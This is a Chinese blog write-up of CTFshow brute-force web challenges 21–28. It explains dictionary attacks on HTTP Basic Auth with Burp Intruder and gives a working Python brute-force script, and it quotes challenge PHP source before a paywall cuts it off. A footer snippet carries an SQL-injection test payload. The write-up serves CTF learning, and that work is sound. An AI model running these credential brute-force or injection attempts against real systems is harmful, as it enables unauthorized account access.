CTFshow——web入门——爆破web21-web28 详细Writeup

Web安全挑战:爆破与密码验证,
最新推荐文章于 2025-04-05 14:52:32 发布
原创 最新推荐文章于 2025-04-05 14:52:32 发布 · 590 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

文章讲述了在Web安全挑战中,通过抓包、Base64编码、爆破技术(如Intruder和BurpSuite)破解登录凭证的过程,涉及MD5哈希、随机数生成及特定条件验证,最终获取flag。

web21

爆破什么的,都是基操

image-20230801133040217
要求我们登录,但是什么都没给,只能通过爆破来登录

利用题目给我们的字典和burp进行爆破,先抓包

image-20230801133535212

查看请求头看见账号密码是以base64编码形式发送的,解密一下可看见格式是账号:密码,先发送到Intruder

image-20230801134511161

攻击方式选择狙击手(Sniper),将要爆破的字段添加变量,然后点击Payloads
image-20230801134801865

接下来开始爆破,选择自定义迭代器,猜测用户名是admin,并且:也是固定的

在位置1添加admin:

image-20230801135113979

位置2导入密码字典

image-20230801135200267

在下面有效负载处理添加base64编码

image-20230801135242419

注意不要选择url编码字符

image-20230801135303129

然后返回点开始攻击

image-20230801135824484

爆破出结果后按照长度排序(不然很难找),得到flag

image-20230801135805073

也可以用脚本来爆破

import time
import requests
import base64

url = 'http://f3975ea2-66c3-456e-9161-3284b75296e5.challenge.ctf.show/index.php'

password = []

with open("1.txt", "r") as f:  
	while True:
	    data = f.readline() 
	    if data:
	    	password.append(data)
	    else:
	      break
	    


for p in password:
	strs = 'admin:'+ p[:-1]
	header={
   
   
		'Authorization':'Basic {}'.format(base64.b64encode(strs.encode('utf-8')).decode('utf-8'))
	}
	rep =requests.get(url,headers=header)
	time.sleep(0.2)
	if rep.status_code ==200:
		print(rep.text)
		break

跑出结果

image-20230801140119443

web22

域名也可以爆破的,试试爆破这个ctf.show的子域名

但是域名更新后,flag.ctf.show域名失效

内容是flag{ctf_show_web},直接交就可以了

web23

还爆破?这么多代码,告辞!

打开后得到源码

<?php
error_reporting(0);

include('flag.php');
if(isset($_GET['token'])){
   
   
    $token = md5($_GET['token']);
    if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
   
   
        if((intval(substr($token, 1,1))+intval(substr($token<
最低0.47元/天 解锁文章
CTFshow-Web入门writeup
m0_61596829的博客
06-08 741
CTFshow-Web入门writeup
CTFshow web入门 web28~web40 命令执行
qq_56815564的博客
04-12 865
这里可以使用的是data伪协议 data://text/plain,这个相当于执行了php语句,后面跟上的 “.php” 因为前面的php语句已经闭合了,所以后面跟上的 “.php” 会被当成html页面直接显示在页面上,起不到什么作用。很明显,flag应该就在flag.php里,但不能直接访问flag.php 因为不能直接输入字符flag,被过滤了。而filter协议和php://input如果要传的话,必须出现具体的文件名,而flag被过滤了,所以不能用。另外这里的eval($c);
ctfshow web入门21-28爆破
2202_75317918的博客
09-23 663
ctfshow web入门21-28爆破
web入门——ctfshow21-28爆破
weixin_73668856的博客
12-03 566
web 入门
CTFSHOW-WEB入门 writeup
abtgu的博客
09-29 1970
web1 题目: 开发注释未及时删除 解题思路: 右键查看源代码即可得到flag。 web2 题目: js前台拦截 === 无效操作 解题思路: 火狐浏览器禁止JavaScript之后,右键查看源代码,得到flag。 web3 题目: 没思路的时候抓个包看看,可能会有意外收获 解题思路: burp抓包,查看响应头,得到flag。 web4 题目: 解题思路: 根据提示访问http://a03708c9-ff09-457d-9688-676ccb7997ce.chall.ctf.show/robots.txt
ctfshow-web入门-爆破web21-24)
HkD01L的博客
06-19 643
ctfshow,爆破,web21,web22,web23,web24,writeup,ctf
CTFShow Web 入门爆破题(web21 -web28WriteUp
最新发布
weixin_75168674的博客
04-05 669
如果你想要每一题更详细的脚本或抓包演示,也可以告诉我,我来帮你生成或补充。或者这些值是 predictable,比如 timestamp 是当前时间戳。或者验证码只对第一步生效,尝试使用 Cookie/session 绕过。错误提示可能不同,比如“用户名不存在”和“密码错误”。抓包后观察验证码请求接口,看返回的是不是一个固定值。是否可以不提交或任意值?验证码只校验一次(验证码逻辑和登录逻辑分开)。验证码图片是静态图片,或者内容固定。某些参数其实并不验证,可以尝试绕过。或类似的路径,直接返回验证码值。
CTFShow-web入门WriteUp(长期更新)
子推的Blog
03-26 859
web21 下载zip文件是后台密码字典,用户名猜测admin,先进行抓包 没有发现我们传输的参数,但是HTTP请求头里面有这样的参数 解码之后发现这是我们传输的参数,所以开始爆破 因为编码前几位是admin:的base64,所以我们只需要把密码所在段设置为变量即可 然后对payload进行base64加密,进行爆破 这里有点需要注意,我们要关闭Payload Encoding,因为我们base64加密结果可能会存在=或者==,payload encoding会将=进行编码 或者写python脚
CTFSHOW 内部赛web writeup
ashMOB的博客
10-29 5359
CTFSHOW 内部赛web writeup 太菜了不会写,按着羽师傅和bmth666师傅的writeup复现 签到 打开界面如上,右键源码可以看到有一个register.php注册界面,需要利用login和register界面来进行sql盲注,sql太菜了连代码都看不懂,直接贴师傅们写的脚本 import requests import re url1 = "http://dd2ae20d-7588-4d04-af33-86ce7a48313d.challenge.ctf.show/register.
CTFshow-Web入门-Web21-28爆破完结篇)
m0_61155226的博客
03-21 746
CTFshow-Web入门21-28
CTFSHOW-爆破
Yb_140的博客
04-06 2487
web21 首先下载网站提供的zip 直接通过burp爆破 随便输入账号和密码,使用提供的字典,进行爆破 经过base64解码 为我们输入的账号密码 设置 爆破完成,得到Flag web22 提示:爆破子域名ctf.show 使用在线查询工具:在线子域名查询 逐个访问 发现 得到Flag web23 由代码可以知道token被md5加密了,分析可知 当第二位等于第十五位等于第十八位,第二位加上...
ctfshow web入门 writeup 1-20(信息收集)
qq_44893894的博客
10-31 1370
信息收集系列 web1 题目:开发注释未及时删除 根据题目意思查看网页源代码,发现flag web2 题目:js前台拦截 === 无效操作 打开页面->无法显示源代码->根据题目因为js前台拦截,右键,以及F12均无法查看源码 在url前加上view-source:,或者设置浏览器禁止JavaScript(我在chrome的设置中搜索JavaScript找到了,Firefox没找到),即可查看源码并得到flag web3 题目:没思路的时候抓个包看看,可能会有意外收获 根据题目提示用burpsu
ctfshow爆破
遇事不决冲冲冲
08-19 3129
web21 登陆抓包 发现账号密码被加密,这里先解密 发现中间用一个冒号隔开了,发到Intruder模块进行爆破 利用题目所给的字典(重命名为.zip,再解压出来),在Payload1后添加:后缀,对Payload1、2进行base64加密 Payload set 1 Payload set 2 因为这样跑需要跑太多次了,这里已经知道账号就是admin了,直接对密码进行爆破。 发送到重放模块得到flag web22 web23 web24 web25 web26 web27 web28 ...
CTFshow 爆破
zyw268的博客
05-15 418
用题目给的字典 在添加两条规则 第一个是增加前缀 admin: 第二个是使得payload进行base64编码 取消URL编码字符 因为会把=号编码了 开始爆破 成功爆破出密码 获得flag。分析第一步当r=0时会输出第一个中的负数 再用这个种子用脚本跑出第二个种子 用php脚本跑出第三种子 用第三个种子做token 第一个种子做r的传参获得flag。用子域名爆破工具爆破了好久也没找到flag 看wp 说是在vip.ctf.show有flag 但是现在找不到了。进来看都是代码 分析代码 用php代码跑。
CTFshow爆破
2301_76227305的博客
12-27 376
直接访问页面的话会弹窗需要输入密码验证,抓个包看看,发现是Authorization认证,Authorization请求头用于验证是否有从服务器访问所需数据的权限。把Authorization后面的数据进行base64解码,就是我们刚刚输入的账号密码。发送到爆破模块,选择要爆破的参数,选择狙击手模式。payload设置选择Custom iterator,自定义模式。根据上面的密码账号格式,第一个payload设置为用户名admin(盲猜)。第二个payload设置为:。
ctfshow_爆破
qq_45951598的博客
03-10 314
这里写目录标题web23web24 web23 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-03 11:43:51 # @Last Modified by: h1xa # @Last Modified time: 2020-09-03 11:56:11 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0);
ctfshow web入门 爆破 21-28
m0_64815693的博客
04-05 1481
ctfshow web入门 爆破 21-28
[ctfshow 2021摆烂杯] WEB部分 writeup
ShenZ的博客
01-24 1387
[ctfshow 2021摆烂杯] WEB部分 writeup web签到 一行代码 黑客网站 登陆不了 1.读一些敏感文件 2.利用web.xml写jsp???? 官方的wp:https://qgieod1s9b.feishu.cn/docs/doccnC4EpMhSv1Ni6mbL7BQQdBc
CTFSHOW-web-web4
12-27
### CTF SHOW Web 类别挑战资源与解决方案 对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及到常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞(LFI/RFI)等。 为了更好地理解和解决这些挑战,可以从以下几个方面入手: #### 学习基础理论和技术 深入理解HTTP协议的工作原理及其请求响应机制是非常重要的。掌握如何通过浏览器开发者工具分析网络流量可以帮助识别潜在的安全问题[^1]。 #### 利用在线学习资源 有许多优质的网站提供了关于Web渗透测试的学习材料和实践环境,例如OWASP Top Ten项目文档,它列举并解释了当前最严重的Web应用风险;还有像PortSwigger Academy这样的平台提供了一系列课程来教授各种类型的Web漏洞挖掘方法。 #### 参考社区讨论和Writeup 加入相关的技术论坛或社交媒体群组,在那里可以看到其他参赛者发布的writeups(解题报告),这对于获取灵感非常有帮助。GitHub上也有很多开源仓库专门收集整理了不同赛事下的高质量writeup链接集合。 ```python import requests def check_sql_injection(url, param): test_payload = "' OR '1'='1" data = {param: test_payload} response = requests.post(url, data=data) if "Welcome" in response.text: print(f"[+] SQL Injection vulnerability detected on parameter '{param}'!") else: print("[-] No SQL Injection found.") ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leafzzz__

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值